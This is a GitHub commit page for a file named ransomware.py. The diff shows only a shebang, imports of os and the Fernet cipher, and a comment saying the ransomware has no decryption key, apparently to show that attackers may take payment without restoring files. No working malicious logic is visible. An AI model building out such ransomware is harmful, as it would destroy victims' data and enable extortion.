Skip to content

Commit

Permalink
ransomware.py
Browse files Browse the repository at this point in the history
  • Loading branch information
privateboss0 authored Jul 14, 2024
1 parent bd0f968 commit 784f7a5
Showing 1 changed file with 1 addition and 1 deletion.
Original file line number Diff line number Diff line change
@@ -1,5 +1,5 @@
#!/usr/bin/env python3

#This is a ransomware without the decryption key and it is to demonstrate some hackers will collect payment without any intention of releasing the locked file.
import os
from cryptography.fernet import Fernet

Expand Down

0 comments on commit 784f7a5

Please sign in to comment.